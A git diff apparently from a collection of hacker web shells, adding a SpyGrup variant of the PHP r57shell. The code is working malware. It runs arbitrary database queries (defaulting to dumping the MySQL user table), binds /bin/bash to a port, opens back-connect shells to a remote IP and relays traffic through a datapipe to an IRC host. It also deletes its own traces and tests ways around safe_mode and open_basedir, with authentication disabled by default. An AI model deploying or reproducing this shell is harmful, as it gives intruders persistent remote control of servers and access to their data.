+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/r577.php.php.txt b/xakep-shells/PHP/r577.php.php.txt
new file mode 100644
index 0000000..3d7547b
--- /dev/null
+++ b/xakep-shells/PHP/r577.php.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ??????: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ ?????????  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ ?????????????? ~~~ */
+
+// $auth = 1; - ?????????????? ????????
+// $auth = 0; - ?????????????? ?????????
+$auth = 0;
+
+// ????? ? ?????? ??? ??????? ? ???????
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!!
+$name='teufel'; // ????? ????????????
+$pass='spyms'; // ?????? ????????????
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+????? ?????
+$language='eng' - ???????
+$language='ru' - ??????????
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
